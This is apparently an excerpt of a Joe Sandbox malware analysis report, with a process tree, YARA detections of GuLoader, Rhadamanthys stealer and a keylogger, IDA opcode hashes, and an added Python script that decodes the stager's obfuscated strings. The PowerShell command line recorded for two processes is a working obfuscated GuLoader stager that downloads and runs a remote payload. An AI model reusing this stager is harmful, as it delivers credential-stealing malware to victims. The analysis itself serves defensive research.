                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:06:47:23
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='Dogernes';;$Eksplosionsmotorernes47=$host.Name; function Resubmerging($Dagsproduktionernestjeneste){If ($Eksplosionsmotorernes47) {$Satirizers='Flippermaskiners';$Heterogenes=2;$Dagsproduktionerne=$Heterogenes}do{$laboratorieplanlgningers+=$Dagsproduktionernestjeneste[$Dagsproduktionerne];$Dagsproduktionerne+=3} until(!$Dagsproduktionernestjeneste[$Dagsproduktionerne])$laboratorieplanlgningers}function Impalement($Lucern179){ .($Raaderet113) ($Lucern179)}$Aabningshaand=Resubmerging 'Sun,reSlTSy. rw';$Aabningshaand+=Resubmerging 'BeE.lBSyCSpLKai CeShn t';$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';$Telemetered=Resubmerging 'AtT SlGus s1 I2';$Dagsproduktionernendows='Pl[AcnP EOrtEu.Nos ae,mrUavS,iS c pEMaPS o yiDon DtB M a cn.jaMaGUnEJerlo]Ca: :SkS eeTacBlU urPiiBit AYBep ORInoM TEloTaCFao.nl B=Sc$IntMie LReeTemKuEViTP.eUdrLiEK D';$Stikkelsbrbens127+=Resubmerging 'S 5 r.,a0Sn Pe(F W MiannArdDioVswRes BeNApTA Pl1 r0Ra. e0Li; o CrWJeiUnnDi6Ne4Fo;fo PixRe6F 4R ; D F rBuv h:Lk1Hi3 T1 u.Ep0 H) S StG EeRac.ekBuo T/ 2 G0Op1 .0Fe0Sc1 O0Sq1Ne BlF Pi UrFoe fAnoAlxFr/,r1 .3B,1.i. S0';$Centas=Resubmerging ',oU s SE CrSc- Ma g deHyN UT';$morbidise=Resubmerging 'Ovh ntU tTipTrsDr:Ra/Ou/ ,w Sw NwFi. ttC dUne BjDibta.Kic so .m v/SukPopEl/HaE kpPei.il ea rc lhCrnSwa.t. ,qMuxEfdPu>.ah Pt Bttrprns a:Co/Sv/ Lw dwK.wS . fUdt AsG ePrnGigT iMon leMeeHorV sCa. 
BcUfoBrm T/KakScmWo/ OENepAuiJalHaaRicfihHonLeaAk.OlqMux Cd';$Dixenite=Resubmerging 'Sc>';$Raaderet113=Resubmerging ' ,I ePaX';$Feminologisk='Bestrr';$klerum='\Enspndervognes.Eks';Impalement (Resubmerging ' K$ sgN lIno bgiAPrl C:UnrA a ,bOvAD lGedRveRerReMTed RE.e=O,$ le ,N FV C: BAScp .pQudLraFoTprASk+b.$SpKFeLU E nRLauSeM');Impalement (Resubmerging ' S$ GC.lKoO pbUcAS lO,:DiGLaAilsMatVaR OO gm ,E nNvitoAVi=Ta$FoMO oEurUrb BIRedSpi Ssane p.PrsInP el PiSktKo( d$b d FI oXInE enC IGgTUdEUn)');Impalement (Resubmerging $Dagsproduktionernendows);$morbidise=$gastromenia[0];$Parfumens=(Resubmerging 'Lr$moG KlBiO ebUgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y BiDdntig p.TrHaneUnaS.dH e Rr usIm[ D$ SC .e SnUntM,a.es G]I,=Bl$prSTotPaiPikvikN,e UlTrsEkbArrSvb ieCun s A1Ud2 a7');$Nonappreciative=Resubmerging 'Im$KaDPie .cFia .lIncGui,nf .yUkiAsn g.d. 
SD o.lwEunSulUno RaP dUlFC iInlEfeTi(Ty$ ,m EovarKabEniBrdCaisasileFl,Fr$S.S ooJak TlT e.ptAnt feUnnAn7K,6 O)';$Sokletten76=$Rabaldermde;Impalement (Resubmerging ',e$T gliL vOMaB BAAplUm: S ,T vOReS ,NTuI.xN.uG e rnL,s e=.a(PaTSneL.SsttTr-GePUra,eTCoHE D $KySMaO Hk .LIbEd tChT SEV,nra7Re6Va)');while (!$Stosningens) {Impalement (Resubmerging 'Mu$EpgShlHuovabHyaCol :B.Mmuo Rn ra NrP.k i,usM.tA.iB s.nkLee r=F $NaO pK tL jS.e nKii vnSugInsPaaO a r') ;Impalement $Nonappreciative;Impalement (Resubmerging 'UnsSctUnAtoRAaTC -Sas NLKreNoECapTe C4');Impalement (Resubmerging ' F$OvgS.lNoo lBPaaA lT,:RosUnTInoO.s,rnbeiRenAggemE ,N .S e=Te(unt EeceSInTKe-ChPArASaT Sh K M $T sOvOprk l.vESkTSkTC EAnnTo7 V6La)') ;Impalement (Resubmerging 'Le$a GE lSeONdB a,tL k:GooPrU rt,uTBeiBer PismN DgRe=Lo$.mg rlS,oSoB raSuLVe:StM e RDrcVih taIbNKoDSkr TYAt+ a+,e% A$TegC.a S et Mrfuo yMR EgrN KI aHa..ncCeoInuReNSkt') ;$morbidise=$gastromenia[$Outtiring]}$Bortfaldes50=318066;$Rulle=26987;Impalement (Resubmerging 'fe$ ,g l Mo Ub ,AanLPa:E.tbeES,NPeUNiTVeODysAn .b= .ig SE TtTo-a CL,OOiNSct.eEManMeT o Li$DesBrOKikP LCrEKat HtInEKeNCh7M,6');Impalement (Resubmerging 'H $TagStl PoFibCoa.bltu: tRWieBnaKal MkFirFoeExdToiAatWo Di=Ex O,[UnSG y UsC tR eApmSc.InCS o unB vFoeGlrT,tPi]We:Pr:BeF Kr.eoD m mB Ha TsS eSk6 S4 TSVetInrviiAfnAugSi(M,$EsTKoeS.n PuLatLaoG sCo)');Impalement (Resubmerging ' E$ nGMclP,OC.bHoALilPo:AnpHeRPoOVig KRPlATrMApUInDH,f ,R lESoLU.SB E N P= n i[S SJuYstsUnT eE oMC,.SuTPeeChX vTSk.HaeInNH,cbeoKadCoiPlNGoGVe]I.:Ny: mA.psL CEmIBii r. sG eTitK sg.T yRh I N gRe(By$MaR.oeQuA iL mKDerUnesaD Ri rT s)');Impalement (Resubmerging 'Ik$UdG Sl OoFoB eA,klHa:I,nAgODinFoGSiaE.sHeShyYFa=Bl$BupMorGuo .gPur SaKomT.U,aDS.fFlRBaelgLAmSS eJondo.m S .uDibPaSVeT r iiM nVegbu(Mo$Wobreo DrPrtBofP.A SLFrdC eTysye5Fo0Mi,De$,urRdUs L TLScE.r)');Impalement $Nongassy;"
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.1980105016.0000016E76FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:06:47:23
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:8
                                                                                  Start time:06:47:40
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='Dogernes';;$Eksplosionsmotorernes47=$host.Name; function Resubmerging($Dagsproduktionernestjeneste){If ($Eksplosionsmotorernes47) {$Satirizers='Flippermaskiners';$Heterogenes=2;$Dagsproduktionerne=$Heterogenes}do{$laboratorieplanlgningers+=$Dagsproduktionernestjeneste[$Dagsproduktionerne];$Dagsproduktionerne+=3} until(!$Dagsproduktionernestjeneste[$Dagsproduktionerne])$laboratorieplanlgningers}function Impalement($Lucern179){ .($Raaderet113) ($Lucern179)}$Aabningshaand=Resubmerging 'Sun,reSlTSy. rw';$Aabningshaand+=Resubmerging 'BeE.lBSyCSpLKai CeShn t';$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';$Telemetered=Resubmerging 'AtT SlGus s1 I2';$Dagsproduktionernendows='Pl[AcnP EOrtEu.Nos ae,mrUavS,iS c pEMaPS o yiDon DtB M a cn.jaMaGUnEJerlo]Ca: :SkS eeTacBlU urPiiBit AYBep ORInoM TEloTaCFao.nl B=Sc$IntMie LReeTemKuEViTP.eUdrLiEK D';$Stikkelsbrbens127+=Resubmerging 'S 5 r.,a0Sn Pe(F W MiannArdDioVswRes BeNApTA Pl1 r0Ra. e0Li; o CrWJeiUnnDi6Ne4Fo;fo PixRe6F 4R ; D F rBuv h:Lk1Hi3 T1 u.Ep0 H) S StG EeRac.ekBuo T/ 2 G0Op1 .0Fe0Sc1 O0Sq1Ne BlF Pi UrFoe fAnoAlxFr/,r1 .3B,1.i. S0';$Centas=Resubmerging ',oU s SE CrSc- Ma g deHyN UT';$morbidise=Resubmerging 'Ovh ntU tTipTrsDr:Ra/Ou/ ,w Sw NwFi. ttC dUne BjDibta.Kic so .m v/SukPopEl/HaE kpPei.il ea rc lhCrnSwa.t. ,qMuxEfdPu>.ah Pt Bttrprns a:Co/Sv/ Lw dwK.wS . fUdt AsG ePrnGigT iMon leMeeHorV sCa. 
BcUfoBrm T/KakScmWo/ OENepAuiJalHaaRicfihHonLeaAk.OlqMux Cd';$Dixenite=Resubmerging 'Sc>';$Raaderet113=Resubmerging ' ,I ePaX';$Feminologisk='Bestrr';$klerum='\Enspndervognes.Eks';Impalement (Resubmerging ' K$ sgN lIno bgiAPrl C:UnrA a ,bOvAD lGedRveRerReMTed RE.e=O,$ le ,N FV C: BAScp .pQudLraFoTprASk+b.$SpKFeLU E nRLauSeM');Impalement (Resubmerging ' S$ GC.lKoO pbUcAS lO,:DiGLaAilsMatVaR OO gm ,E nNvitoAVi=Ta$FoMO oEurUrb BIRedSpi Ssane p.PrsInP el PiSktKo( d$b d FI oXInE enC IGgTUdEUn)');Impalement (Resubmerging $Dagsproduktionernendows);$morbidise=$gastromenia[0];$Parfumens=(Resubmerging 'Lr$moG KlBiO ebUgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y BiDdntig p.TrHaneUnaS.dH e Rr usIm[ D$ SC .e SnUntM,a.es G]I,=Bl$prSTotPaiPikvikN,e UlTrsEkbArrSvb ieCun s A1Ud2 a7');$Nonappreciative=Resubmerging 'Im$KaDPie .cFia .lIncGui,nf .yUkiAsn g.d. 
SD o.lwEunSulUno RaP dUlFC iInlEfeTi(Ty$ ,m EovarKabEniBrdCaisasileFl,Fr$S.S ooJak TlT e.ptAnt feUnnAn7K,6 O)';$Sokletten76=$Rabaldermde;Impalement (Resubmerging ',e$T gliL vOMaB BAAplUm: S ,T vOReS ,NTuI.xN.uG e rnL,s e=.a(PaTSneL.SsttTr-GePUra,eTCoHE D $KySMaO Hk .LIbEd tChT SEV,nra7Re6Va)');while (!$Stosningens) {Impalement (Resubmerging 'Mu$EpgShlHuovabHyaCol :B.Mmuo Rn ra NrP.k i,usM.tA.iB s.nkLee r=F $NaO pK tL jS.e nKii vnSugInsPaaO a r') ;Impalement $Nonappreciative;Impalement (Resubmerging 'UnsSctUnAtoRAaTC -Sas NLKreNoECapTe C4');Impalement (Resubmerging ' F$OvgS.lNoo lBPaaA lT,:RosUnTInoO.s,rnbeiRenAggemE ,N .S e=Te(unt EeceSInTKe-ChPArASaT Sh K M $T sOvOprk l.vESkTSkTC EAnnTo7 V6La)') ;Impalement (Resubmerging 'Le$a GE lSeONdB a,tL k:GooPrU rt,uTBeiBer PismN DgRe=Lo$.mg rlS,oSoB raSuLVe:StM e RDrcVih taIbNKoDSkr TYAt+ a+,e% A$TegC.a S et Mrfuo yMR EgrN KI aHa..ncCeoInuReNSkt') ;$morbidise=$gastromenia[$Outtiring]}$Bortfaldes50=318066;$Rulle=26987;Impalement (Resubmerging 'fe$ ,g l Mo Ub ,AanLPa:E.tbeES,NPeUNiTVeODysAn .b= .ig SE TtTo-a CL,OOiNSct.eEManMeT o Li$DesBrOKikP LCrEKat HtInEKeNCh7M,6');Impalement (Resubmerging 'H $TagStl PoFibCoa.bltu: tRWieBnaKal MkFirFoeExdToiAatWo Di=Ex O,[UnSG y UsC tR eApmSc.InCS o unB vFoeGlrT,tPi]We:Pr:BeF Kr.eoD m mB Ha TsS eSk6 S4 TSVetInrviiAfnAugSi(M,$EsTKoeS.n PuLatLaoG sCo)');Impalement (Resubmerging ' E$ nGMclP,OC.bHoALilPo:AnpHeRPoOVig KRPlATrMApUInDH,f ,R lESoLU.SB E N P= n i[S SJuYstsUnT eE oMC,.SuTPeeChX vTSk.HaeInNH,cbeoKadCoiPlNGoGVe]I.:Ny: mA.psL CEmIBii r. sG eTitK sg.T yRh I N gRe(By$MaR.oeQuA iL mKDerUnesaD Ri rT s)');Impalement (Resubmerging 'Ik$UdG Sl OoFoB eA,klHa:I,nAgODinFoGSiaE.sHeShyYFa=Bl$BupMorGuo .gPur SaKomT.U,aDS.fFlRBaelgLAmSS eJondo.m S .uDibPaSVeT r iiM nVegbu(Mo$Wobreo DrPrtBofP.A SLFrdC eTysye5Fo0Mi,De$,urRdUs L TLScE.r)');Impalement $Nongassy;"
                                                                                  Imagebase:0x880000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000008.00000002.2135088634.0000000008CA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.2135880774.0000000009729000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000008.00000002.2113268820.0000000005FDC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true
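The PowerShell command line recorded for Target ID 3 and Target ID 8 carries its own string decoder, `Resubmerging`: it starts at offset 2 (`$Heterogenes=2`), appends every third character (`$Dagsproduktionerne+=3`) and stops when the index runs past the end of the string, which PowerShell reports as `$null`. Every argument the script later hands to `Impalement` (which applies the invocation operator `.( )` to the decoded text) goes through this routine. The script below is an added example, not part of the Joe Sandbox report and not code from the sample, that re-implements the decoder in Python and runs it over `$name=Resubmerging '<blob>'` assignments pulled from the command line with a regular expression. The excerpt it decodes is constructed from four assignments copied from the command line above; the variable names are the sample's own. One caveat the example checks for: the report's HTML rendering collapses runs of consecutive spaces, so a blob whose length is not a multiple of three has lost filler characters and cannot be decoded from the rendered page (the `$Raaderet113` blob, which names the command `Impalement` invokes, is one such case).

```python
import re

# Parameters taken from the stager's own Resubmerging function:
# $Heterogenes=2 is the starting offset, $Dagsproduktionerne+=3 the stride,
# and the do/until loop ends when $string[$index] is $null (index past the end).
START = 2
STRIDE = 3


def resubmerging(blob: str, start: int = START, stride: int = STRIDE) -> str:
    """Python re-implementation of the stager's Resubmerging decoder.

    The payload string is every third character of the blob beginning at
    offset 2; the two characters in front of each real one are filler.
    """
    return blob[start::stride]


def is_intact(blob: str, stride: int = STRIDE) -> bool:
    """A well-formed blob is a whole number of (filler, filler, real) triplets.

    The report's HTML rendering collapses runs of spaces, which deletes filler
    and shifts every later real character off the stride, so a length that is
    not a multiple of the stride means the blob cannot be decoded from the
    rendered text and must be taken from the raw command line instead.
    """
    return len(blob) % stride == 0


# Matches "$name=Resubmerging '<blob>'" and "$name+=Resubmerging '<blob>'".
ASSIGN_RE = re.compile(r"\$(\w+)\s*\+?=\s*Resubmerging\s+'([^']*)'")


def decode_assignments(script: str) -> dict:
    """Map every variable assigned from Resubmerging '<blob>' to its decoded
    value, together with an 'intact' flag from is_intact()."""
    result = {}
    for name, blob in ASSIGN_RE.findall(script):
        result[name] = {"decoded": resubmerging(blob), "intact": is_intact(blob)}
    return result


# Constructed excerpt: four assignments copied verbatim from the powershell.exe
# command line in the process tree (Target ID 3 and Target ID 8).
STAGER_EXCERPT = (
    "$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';"
    "$Telemetered=Resubmerging 'AtT SlGus s1 I2';"
    "$Dixenite=Resubmerging 'Sc>';"
    "$Raaderet113=Resubmerging ' ,I ePaX';"
)


if __name__ == "__main__":
    for name, info in decode_assignments(STAGER_EXCERPT).items():
        status = "ok" if info["intact"] else "DAMAGED (spaces collapsed in rendering)"
        print(f"${name:<18} -> {info['decoded']!r}  [{status}]")
```

On the excerpt the intact blobs decode to `Mozilla/` (the start of the User-Agent string the script assembles in `$Stikkelsbrbens127`), `Tls12` (the value assigned to `$Telemetered`) and `>` (assigned to `$Dixenite`), while the `$Raaderet113` blob is flagged as damaged rather than silently mis-decoded. When the exact values matter, feed the decoder the raw command line from the sandbox's process export or from PowerShell script block logging (event ID 4104) rather than the rendered report.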

                                                                                  Target ID:9
                                                                                  Start time:06:47:40
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:10
                                                                                  Start time:06:47:55
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                  Imagebase:0xf20000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.2195588250.0000000021650000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000A.00000003.2200198942.0000000021050000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.2195813778.0000000021870000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000A.00000003.2192874424.0000000000100000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:11
                                                                                  Start time:06:48:06
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\svchost.exe"
                                                                                  Imagebase:0xc60000
                                                                                  File size:46'504 bytes
                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.2196496080.0000000003880000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000003.2199773661.0000000005A50000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000003.2199606583.0000000005830000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1988511120.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9b9e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: U
                                                                                    • API String ID: 0-3372436214
                                                                                    • Opcode ID: 3155a7e90c4e4ba6ea930b64161ecc394a4b97827f66e0918092cd3764cd269b
                                                                                    • Instruction ID: fc1faf6d933aef2e5e172ab1d05a9bb997ca6fc54b0afea78ef664fb4a96d7e4
                                                                                    • Opcode Fuzzy Hash: 3155a7e90c4e4ba6ea930b64161ecc394a4b97827f66e0918092cd3764cd269b
                                                                                    • Instruction Fuzzy Hash: F5E1F830A19A4E8FEBA8DF28C8A57F977D1FF54310F15426ED84EC7295CE749A408B81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1a5c6e0f48d8f557972d9a30fc71de466bce32c37c1f53797782776512a94196
                                                                                    • Instruction ID: d22bcf75169157ad9d0ea51e502beb5c5a481e7186b3b224faec8b8bf817d7a1
                                                                                    • Opcode Fuzzy Hash: 1a5c6e0f48d8f557972d9a30fc71de466bce32c37c1f53797782776512a94196
                                                                                    • Instruction Fuzzy Hash: 98A25632B0EA9A0FE7A5976C88652787BD1EF56220F0A01FEC06DC71E3DE59AC058741
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5a36297083da5f8e31f0e68708ca30c8a98d0fdf94222ad8676eb13e49de8144
                                                                                    • Instruction ID: 591e01c54db349ae435b764b88ccf035986024c41c9ddd968b32f4c1d14d1554
                                                                                    • Opcode Fuzzy Hash: 5a36297083da5f8e31f0e68708ca30c8a98d0fdf94222ad8676eb13e49de8144
                                                                                    • Instruction Fuzzy Hash: 63023832A0EBDD0FE766976888651647BE1EF96220F0A00FED0ACC71E3DD596D45C742
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0bf2bd863760490c9c2ed24c0121e1264568c66de038ac894251f0baccc723d3
                                                                                    • Instruction ID: 5a1a38c3ae04f5ffd2244eb6f8324456e3a160866114ac3815372ee304a9283a
                                                                                    • Opcode Fuzzy Hash: 0bf2bd863760490c9c2ed24c0121e1264568c66de038ac894251f0baccc723d3
                                                                                    • Instruction Fuzzy Hash: CAF12832B0EB990FE7A6976888651747BE1EF56220F1900FED0ACC71E3DE59AC45C742
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1988511120.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9b9e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 51006ff8852f59ced42240b2468aa1d78408e0bd3bba8f1bb83dc6a16b25edd1
                                                                                    • Instruction ID: a6c6dac121b97ac0fafd71d74651d83a6ab3f01ad6a642ca0affd22799c10bb2
                                                                                    • Opcode Fuzzy Hash: 51006ff8852f59ced42240b2468aa1d78408e0bd3bba8f1bb83dc6a16b25edd1
                                                                                    • Instruction Fuzzy Hash: E2F1B530A19A4E8FEBA8DF28C8557F937D1FF54310F04426EE84EC72A5DB349A458B81
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: B_H
                                                                                    • API String ID: 0-493211873
                                                                                    • Opcode ID: 0980bd8f172748c1c8277bac2fe22fb4aa1fa47b400d2503e00b8a08a1df0683
                                                                                    • Instruction ID: 880e0b4c65b3b4c26d3f7291b2c883f7d573587383a9c34bc599ed1ff384b688
                                                                                    • Opcode Fuzzy Hash: 0980bd8f172748c1c8277bac2fe22fb4aa1fa47b400d2503e00b8a08a1df0683
                                                                                    • Instruction Fuzzy Hash: 76A13432B0EBDE0FEBA6976848756B47BD1EF55210F0A00FAC46DC71E3D959AC058741
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1988511120.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9b9e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7c45420372f7aa5fbfd36aaa844812fda87ce85690d4695c90a414ce3c0fe9d1
                                                                                    • Instruction ID: 15bf428ef5a327d978ff4d596ec01746920febbb4a7fb6a47163ca65bbb89fd6
                                                                                    • Opcode Fuzzy Hash: 7c45420372f7aa5fbfd36aaa844812fda87ce85690d4695c90a414ce3c0fe9d1
                                                                                    • Instruction Fuzzy Hash: EC327330A18A4D8FDF98EF5CC4A5AA97BE1FFA8300F154169D409D7296CB35F981CB81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b5ec8d85a6f37ef435de49ff05fd3f537bfc4d629165ee2546c26a9c2f209340
                                                                                    • Instruction ID: 435d022f1971d3e81bef9b62cc3d433138b9a5376038e0befbf5a6c919efe22a
                                                                                    • Opcode Fuzzy Hash: b5ec8d85a6f37ef435de49ff05fd3f537bfc4d629165ee2546c26a9c2f209340
                                                                                    • Instruction Fuzzy Hash: 56E12732A0FB991FE7A5976888756747BE1EF56210F1A00FED0ACC71E3DE186C458742
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8ecdbde84f40c3e6d39abf78fecfb59eb8f6cc93b52580068be3aba56b4cd9b3
                                                                                    • Instruction ID: 8d18d55320578b03aac2134bae811d4df8f84452bd9869e283527c8125f23deb
                                                                                    • Opcode Fuzzy Hash: 8ecdbde84f40c3e6d39abf78fecfb59eb8f6cc93b52580068be3aba56b4cd9b3
                                                                                    • Instruction Fuzzy Hash: AAE12872A0EB9D0FE7659B6888751687BE1EF56210F1A00FED0ACC71E3DE286D458B41
                                                                                    Memory Dump Source
